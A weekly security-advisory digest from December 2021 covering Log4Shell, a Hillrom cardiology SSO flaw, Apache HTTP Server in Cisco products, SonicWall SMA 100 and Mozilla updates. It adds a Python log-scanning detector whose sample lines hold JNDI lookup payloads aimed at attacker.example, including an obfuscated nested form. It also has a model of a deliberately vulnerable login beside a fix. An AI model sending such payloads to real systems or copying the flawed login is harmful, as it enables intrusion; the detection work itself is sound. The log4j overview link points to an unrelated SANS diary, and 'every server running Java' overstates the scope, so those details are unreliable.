Please see Security Advisories for the week ending December 11, 2021
- Critical RCE Zero-Day Exploit Found in Popular Java Logging Library log4j
- Apache Releases Log4j Version 2.15.0 to Address Critical RCE Vulnerability
- CISA Releases Security Advisory for Hillrom Welch Allyn Cardiology Products
- Cisco Releases Security Advisory for Multiple Products Affected by Apache HTTP Server
- SonicWall Releases Security Patches for SMA 100 Series Appliances
- Mozilla Releases Security Updates for Firefox, Firefox ESR, and Thunderbird
_______________________________
Critical RCE Zero-Day Exploit Found in Popular Java Logging Library log4j
Situation
A critical RCE (Remote Code Execution) vulnerability has been found in log4j, a popular Java logging library. This vulnerability is severe and affects every server running Java.
Problem
This vulnerability affects any Java application using log4j. An attacker can send a string that ends up in a log message, and the server will fetch and execute code hosted at the address contained in that string.
Implication
This attack is extremely easy to execute, and many popular products are affected, including Minecraft, Steam, and iCloud.
JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are currently not affected by the primary attack vector (LDAP), but other attack vectors are in use.
Need
It is advised to update servers running Java or log4j as soon as possible. The update for log4j can be found here: https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
There are also ways to mitigate the issue if patching is not available.
________________________________
Apache Releases Log4j Version 2.15.0 to Address Critical RCE Vulnerability
Situation
The Apache Software Foundation has released a security advisory to address a remote code execution vulnerability (CVE-2021-44228) affecting Log4j versions 2.0-beta9 to 2.14.1.
Problem
JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.
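The two log4j items above describe attacker-controlled strings reaching a log message and triggering a JNDI lookup. The following is an added defensive example, not code from the advisory or from the Log4j project: it scans constructed request-log lines for JNDI lookup strings, flattening the nested single-character lookups that Log4j itself resolves before it sees the outer prefix, so the detector is not fooled by them. The log lines, hostnames and the set of schemes matched are assumptions made for the example.

```python
import re

# Constructed sample request log lines (not from the advisory): a benign request,
# a plain lookup in the User-Agent field, and a nested-lookup variant in the query.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"
10.0.0.9 - - [11/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"
10.0.0.9 - - [11/Dec/2021:10:01:09 +0000] "GET /?q=${${lower:j}ndi:rmi://attacker.example/b} HTTP/1.1" 400 "-"
"""

# Log4j evaluates inner lookups first, so ${lower:j}, ${upper:j} and the
# empty-lookup-with-default form ${::-j} all become a bare "j" before the
# outer lookup runs. A detector must perform the same flattening.
_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^{}])\}|\$\{::-([^{}])\}", re.IGNORECASE)

# Schemes checked here are an assumption for the example; extend as needed.
_JNDI = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://([^}/]+)", re.IGNORECASE)


def normalize(text: str) -> str:
    """Collapse single-character lookup wrappers until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _WRAPPER.sub(lambda m: m.group(1) or m.group(2), text)
    return text


def find_jndi_lookups(log_text: str):
    """Return (line_number, scheme, host) for every line carrying a JNDI lookup."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for m in _JNDI.finditer(normalize(line)):
            hits.append((lineno, m.group(1).lower(), m.group(2)))
    return hits


if __name__ == "__main__":
    for lineno, scheme, host in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {lineno}: JNDI lookup via {scheme} to {host}")
```

A hit on a line is an indicator that a lookup string reached the server, not proof that it was evaluated; the host in the hit is what the logging host would have contacted outbound, which is the egress connection to look for in firewall or DNS logs.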
Implication
A remote attacker could exploit this vulnerability to take control of an affected system.
Need
CISA encourages users and administrators to review the Apache Log4j 2.15.0 Announcement and upgrade to Log4j 2.15.0 or apply the recommended mitigations immediately.
For a more technical overview:
https://isc.sans.edu/forums/diary/Keeping+Track+of+Time+Network+Time+Protocol+and+a+GPSD+Bug/27886/
________________________________
CISA Releases Security Advisory for Hillrom Welch Allyn Cardiology Products
Situation
CISA has released an Industrial Control Systems Medical Advisory (ICSMA) detailing a vulnerability in multiple Hillrom Welch Allyn cardiology products.
Problem
The impacted products, when configured to use SSO, are affected by an improper authentication vulnerability. This vulnerability allows the application to accept manual entry of any Active Directory (AD) account provisioned in the application without supplying a password, resulting in access to the application as the supplied AD account, with all associated privileges.
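To make the authentication flaw described above concrete, here is an added illustrative model, not the product's code and not from the advisory: a login routine that, in SSO mode, trusts a typed account name as long as it is provisioned, placed beside a corrected routine that insists on a verified SSO assertion (or a password when SSO is off). The account names, the HMAC-signed assertion format and the password store are all constructed for the example.

```python
import hashlib
import hmac
from typing import Optional

# Constructed set of AD accounts provisioned in the application, mapped to their role.
PROVISIONED = {"DOMAIN\\cardio.tech": "technician", "DOMAIN\\admin": "administrator"}
# Constructed secret shared with the SSO provider, used to sign assertions.
SSO_KEY = b"constructed-demo-key"
# Constructed password store (a real system would use a password KDF, not plain SHA-256).
PASSWORD_HASHES = {"DOMAIN\\cardio.tech": hashlib.sha256(b"constructed-pw").hexdigest()}


def sso_assertion(account: str) -> str:
    """Model of a signed SSO assertion: 'account|hmac' (constructed format)."""
    mac = hmac.new(SSO_KEY, account.encode(), hashlib.sha256).hexdigest()
    return f"{account}|{mac}"


def check_password(account: str, password: Optional[str]) -> bool:
    if password is None or account not in PASSWORD_HASHES:
        return False
    digest = hashlib.sha256(password.encode()).hexdigest()
    return hmac.compare_digest(digest, PASSWORD_HASHES[account])


def login_vulnerable(account: str, sso_enabled: bool, assertion: Optional[str], password: Optional[str]):
    """Flawed flow matching the advisory: with SSO on, a manually typed provisioned
    account is granted its role with no assertion and no password checked."""
    if account not in PROVISIONED:
        return None
    if sso_enabled:
        return PROVISIONED[account]      # identity never proven
    return PROVISIONED[account] if check_password(account, password) else None


def login_fixed(account: str, sso_enabled: bool, assertion: Optional[str], password: Optional[str]):
    """Corrected flow: in SSO mode the role is granted only for an assertion whose
    signature verifies and whose subject matches the requested account."""
    if account not in PROVISIONED:
        return None
    if sso_enabled:
        if assertion is None:
            return None
        asserted, _, mac = assertion.rpartition("|")
        expected = hmac.new(SSO_KEY, asserted.encode(), hashlib.sha256).hexdigest()
        if asserted != account or not hmac.compare_digest(mac, expected):
            return None
        return PROVISIONED[account]
    return PROVISIONED[account] if check_password(account, password) else None
```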
Implication
An attacker could exploit this vulnerability to take control of an affected system.
Need
CISA encourages technicians and administrators to review ICSMA-21-343-01: Hillrom Welch Allyn Cardio Products for more information and apply the necessary mitigations.
For a more technical overview:
https://www.cisa.gov/uscert/ics/advisories/icsma-21-343-01
________________________________
Cisco Releases Security Advisory for Multiple Products Affected by Apache HTTP Server
Situation
Cisco has released a security advisory to address Cisco products affected by multiple vulnerabilities in Apache HTTP Server 2.4.48 and earlier releases.
Problem
The vulnerability is due to incorrect handling of unix: URLs. An attacker could exploit this vulnerability by sending a crafted HTTP request to a vulnerable device. A successful exploit could allow the attacker to get, modify, or delete resources on other services that may otherwise be inaccessible.
Implication
An unauthenticated remote attacker could exploit this vulnerability to take control of an affected system.
Need
CISA encourages users and administrators to review Cisco Advisory cisco-sa-apache-httpd-2.4.49-VWL69sWQ and apply the necessary updates.
________________________________
SonicWall Releases Security Patches for SMA 100 Series Appliances
Situation
SonicWall has released an update to patch multiple vulnerabilities found in SMA 100 series products including SMA 200, 210, 400, 410 and 500v appliances.
Problem
The vulnerabilities include heap-based and stack-based buffer overflows, remote code execution (RCE), CPU exhaustion, command injection as root, and more. These vulnerabilities range in severity from medium to critical (CVSS 5.3 to 9.8). CISA has warned of threat actors actively targeting a known, previously patched vulnerability in SonicWall SMA 100 series appliances.
Implication
Successful exploitation of some of these vulnerabilities could allow a remote attacker to take control of an affected system.
Need
SonicWall strongly urges impacted customers to implement applicable patches as soon as possible to affected SMA 100 series products. Additional information can be found in SonicWall’s security advisory in the link below.
SonicWall security advisory:
________________________________
Mozilla Releases Security Updates for Firefox, Firefox ESR, and Thunderbird
Situation
Mozilla has released security updates for Firefox 95, Firefox ESR 91.4.0, and Thunderbird 91.4.0.
Problem
Mozilla has released fixes addressing vulnerabilities including URL leakage, heap buffer overflows, missing fullscreen and pointer-lock notifications, a GC rooting failure when calling wasm instance methods, and full-screen mode issues on macOS.
Implication
An attacker could exploit some of these vulnerabilities to take control of an affected system.
Need
CISA encourages users and administrators to review the Mozilla security advisories for Firefox 95, Firefox ESR 91.4.0, and Thunderbird 91.4.0 and apply the necessary updates.
For a more technical overview:
https://www.mozilla.org/en-US/security/advisories/mfsa2021-52/
https://www.mozilla.org/en-US/security/advisories/mfsa2021-53/
https://www.mozilla.org/en-US/security/advisories/mfsa2021-54/